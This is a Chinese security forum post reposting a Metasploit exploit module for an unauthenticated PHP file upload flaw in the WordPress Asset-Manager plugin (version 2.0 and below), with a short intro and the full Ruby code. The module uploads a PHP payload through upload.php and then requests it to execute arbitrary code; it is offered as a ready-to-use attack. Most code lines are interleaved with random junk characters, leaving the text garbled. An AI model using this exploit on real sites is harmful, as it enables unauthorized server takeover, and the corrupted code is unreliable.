找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2106|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。0 p  F- I/ ^+ ?
" d8 S$ E$ g, p: |( [
##: h5 \) b  M  T- _3 i
# This file is part of the Metasploit Framework and may be subject to& ]: m8 A1 y2 u* A+ s" B
# redistribution and commercial restrictions. Please see the Metasploit& e3 C3 t( k: [; q+ m5 N
# Framework web site for more information on licensing and terms of use.+ o: q+ E4 v$ i! i! G! [  h7 m
#   http://metasploit.com/framework/
5 R! z8 F: N6 X: g% E# d##5 U! _1 A  n5 E0 x& D4 t

+ B8 g: C$ R" j4 M. ?9 Z5 Jrequire 'msf/core'8 d1 L; \) r7 n8 Q  [$ F! T* q
require 'msf/core/exploit/php_exe'+ S& G/ R- \: ^1 A

* Z! V5 {7 O3 C1 G, K, Qclass Metasploit3 < Msf::Exploit::Remote' N& X8 n6 H. v; k. L; h9 X
  Rank = ExcellentRanking
2 E+ o. @% p" X  j ) Y3 ?: w# w2 t* @) n- l
  include Msf::Exploit::Remote::HttpClient* j. L$ _: Z: M6 N, _8 |" ^
  include Msf::Exploit:hpEXE
) y8 Q! i# T2 G7 o- ^; { / O' t- O1 A8 W- h/ [4 E
  def initialize(info = {})8 V) i* y" E" w" b
    super(update_info(info,
  z2 y  `4 O' q: L      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
6 o# Y3 m6 @$ I* V8 T0 ~0 ~      'Description'    => %q{& M  L$ M* o0 Z+ m2 |( v# M) }0 U0 O% I
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
2 C/ F( P4 }, i: b4 K( I        plugin.  By abusing the upload.php file, a malicious user can upload a file to a2 \0 O: K, |: R  d9 [2 x, I0 o9 w
        temp directory without authentication, which results in arbitrary code execution.% f1 G9 G; ]% i6 O6 d: |  @
      },
* A! o4 n. X( w# L) m5 Q' M- G      'Author'         =>3 K# c+ `7 L' ~* L  f0 T3 h& T1 n8 e
        [
1 o. \- p0 R: Q4 J; \          'Sammy FORGIT', # initial discovery
) z4 ]9 R; p& E5 F          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
$ ~' c$ Z6 ?( g' p" q. @! W/ M        ],! @- v  G0 ^4 b4 @/ G+ Z6 ?
      'License'        => MSF_LICENSE,  t; N( s7 w$ b, _
      'References'     =>7 C$ x5 I/ L  C- V
        [
% E; @9 |3 E4 Y* H          [ 'OSVDB', '82653' ],) @. B. P$ C9 y; T" u: c  V5 L
          [ 'BID', '53809' ],
7 |- ?% }: C( `: h          [ 'EDB', '18993' ],, I. [+ d* \- i# S; D
          [ 'URL', 'http:// www.myhack58.com /' ]8 i$ H7 K# Z' q( I. O1 {9 S0 K
        ],
! Q- T5 k' B9 P1 A4 t0 e; V      'Payload'       =>; Z( V6 p) u* O: e
        {
8 S3 ]2 z4 m$ d8 I          'BadChars' => "\x00",
% {/ d5 i0 q( w, z  ~4 A  g        },# {+ v2 Y8 e  o5 O( ~" P
      'Platform'       => 'php',
7 l$ P4 M$ N. f, f$ y) l      'Arch'           => ARCH_PHP,
7 ?- d6 o3 U0 t9 @: j* G      'Targets'        =>2 g6 ~& L5 K& y: f" @0 ]8 l
        [8 i7 d, i& K0 w3 x& f
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
2 n* z! a/ f' W* j* A  a. i          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]7 \" e6 r$ I9 y% j2 R/ d$ P
        ],7 {. F# |" z8 h+ P% i/ {( w
      'DefaultTarget' => 0,! v1 M. H% L' k4 t; @, X7 C
      'DisclosureDate' => 'May 26 2012'))
2 P! U) I% q  W3 _9 D: N4 r% y4 R
# H; j! L& Q3 ?0 n% F# B    register_options(
+ W3 e, d) o! W# y' `      [
( t: t0 |- z+ J2 u9 V        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
/ `; E* M6 ?: r      ], self.class)
/ _% e- Z8 I- s8 U$ s- j& m  end
+ N- v3 ?. P9 M8 }" k
" W' c, a' C' ~, U# l" ~  def exploit
5 |$ r/ x. q) k3 h0 J7 \    uri =  target_uri.path
& w# ^$ a6 p# a- K4 |' m    uri << '/' if uri[-1,1] != '/'* @/ ^6 R% K: {+ }6 C+ J% e9 {
    peer = "#{rhost}:#{rport}"
; @! r* |3 j2 k  u: p    payload_name = "#{rand_text_alpha(5)}.php"+ F2 Q+ U; O3 T0 R
    php_payload = get_write_exec_payload(:unlink_self=>true)
( W3 e1 J' M7 r$ @7 q ' Y. J0 n. c& _1 V* J: k3 |/ k4 [
    data = Rex::MIME::Message.new, p, o+ q7 v7 ]6 M! `# M& `
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
4 w' Q7 A& X+ ^& R    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
4 R  x  e$ H' |) c% G) m1 i& ?! x % z5 L2 u8 `, N+ F8 I, }
    print_status("#{peer} - Uploading payload #{payload_name}")- D6 Q* C) Y& Z: C
    res = send_request_cgi({
, m, y; |4 n2 B3 f/ T      'method'  => 'POST',6 ^' V2 W$ v# T4 C' q& C' L
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
. {" t5 P$ r7 T! L      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
( v$ Q  p" m$ \; V3 c      'data'    => post_data  R3 S) ^% b) c
    })
- N0 d( V# I+ r; H$ y
( `, q7 y3 T/ j0 l8 T2 ]    if not res or res.code != 200 or res.body !~ /#{payload_name}/0 Q3 }% A- _+ i2 V' s- a
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")$ u6 D- Q4 j( r6 x3 e
end% q& \: T& W% T6 {' B# F

& V: k/ |  P$ _) |# Z, Z    print_status("#{peer} - Executing payload #{payload_name}")1 C; g  R$ Q4 m8 u' X
    res = send_request_raw({2 y( M* [" \3 C$ d6 t; N
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",5 M& C2 w) h! B6 r0 {, u, C! U
      'method'  => 'GET'
/ B' D" L. B8 n. T+ N4 [: G6 e' a    }); D, z0 {( a+ Z8 A' v
1 b6 s0 V% _' l3 a' T+ M1 |' }- U
    if res and res.code != 200/ L$ ~4 r' }# L. j0 m
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")! e! y) b+ l5 }% g9 j
    end  Y, h6 o  [, f  w' Q
  end0 d$ w& x2 F) J& L& j9 I) {- Q
end* U9 q0 x- |# {$ s
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表